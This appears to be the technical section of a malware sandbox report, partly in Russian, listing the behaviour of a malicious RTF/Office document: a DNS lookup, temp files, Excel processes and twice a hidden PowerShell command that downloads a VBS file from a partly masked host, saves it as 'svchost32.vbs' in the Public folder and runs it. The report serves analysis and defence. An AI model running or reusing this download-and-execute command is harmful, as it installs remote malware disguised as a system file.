Техническая информация
- http://fa###cargo.com/images/file/vb/39.vbs как c:\users\public\\svchost32.vbs
- '<SYSTEM32>\cmd.exe' /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fa###cargo.com/images/file/vb/39.vbs','%Public%\\svchost32.vbs');Start-Process '%Public%\\svchost32.vbs'
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{a5c227a2-b723-4fa9-b83d-a7c7f8f20e05}.tmp
- <Текущая директория>\~wrd0000.tmp
- <PATH_SAMPLE>.rtf
- http://fa###cargo.com/images/file/vb/39.vbs
- DNS ASK fa###cargo.com
- '<SYSTEM32>\cmd.exe' /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fa###cargo.com/images/file/vb/39.vbs','%Public%\\svchost32.vbs');Start-Process '%Public%\\svchost32.vbs'' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\svchost32.vbs"
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding